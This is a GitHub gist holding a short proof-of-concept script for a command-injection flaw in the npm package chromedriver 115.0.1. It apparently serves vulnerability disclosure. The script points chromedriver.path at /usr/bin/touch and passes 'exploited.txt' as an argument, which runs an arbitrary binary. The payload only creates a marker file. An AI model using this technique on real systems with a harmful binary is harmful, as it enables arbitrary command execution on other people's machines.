Skip to content

Instantly share code, notes, and snippets.

@mcoimbra

mcoimbra/chromedriver-115.0.1_poc.js

Created October 26, 2023 17:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mcoimbra/47b1da554a80795c45126d51e41b2b18 to your computer and use it in GitHub Desktop.
Save mcoimbra/47b1da554a80795c45126d51e41b2b18 to your computer and use it in GitHub Desktop.
Download ZIP
Package chromedriver: possible to do command injection by manipulating the arguments.
Raw
chromedriver-115.0.1_poc.js
'use strict'
const chromedriver = require('chromedriver');
const args = ['exploited.txt'];
const returnPromise = false;
chromedriver.path = '/usr/bin/touch';
// This creates a local 'exploited.txt' file.
chromedriver.start(args, returnPromise);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment